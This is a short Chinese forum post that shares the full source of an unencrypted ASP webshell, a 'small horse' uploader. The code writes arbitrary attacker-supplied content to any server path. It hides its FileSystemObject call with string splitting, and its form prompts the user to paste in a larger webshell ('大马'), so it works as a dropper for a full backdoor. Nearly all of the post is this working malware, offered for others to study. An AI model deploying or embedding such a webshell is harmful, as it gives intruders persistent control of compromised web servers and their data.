[分享] 一个未加密的ASP小马

一个未加密的ASP小马,有兴趣的朋友可以研究一下,程序本身不是很难!

<meta http-equiv="Content-Type" c>
<title>WebShell</title>
<%@ LANGUAGE = VBScript.Encode %>
<%dim objfso%>
<%dim fdata%>
<%dim objcountfile%>
<%on error resume next%>
<%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")%>
<%if trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%set objcountfile=objfso.createtextfile(request("syfdpath"),true)%>
<%objcountfile.write fdata%>
<%if err =0 then%>
<%response.write "<font color=red>保存-成功</font>"%>
<%else%>
<%response.write "<font color=red>保存-不成功</font>"%>
<%end if%>
<%err.clear%>
<%end if%>
<%objcountfile.close%>
<%set objcountfile=nothing%>
<%set objfso = nothing%>
<%response.write "<form action='''' method=post>"%>
<%response.write "保存文件的<font color=red>绝对路径(包括文件名:如d:\web\x.asp):</font>"%>
<%response.write "<input type=text name=syfdpath width=32 size=50>"%>
<%response.write "<br>"%>
<%response.write "本文件绝对路径"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%response.write "<br>"%>
<%response.write "输入大马的内容:"%>
<%response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%>
<%response.write "<input type=submit value=保存>"%>
<%response.write "</form>"%>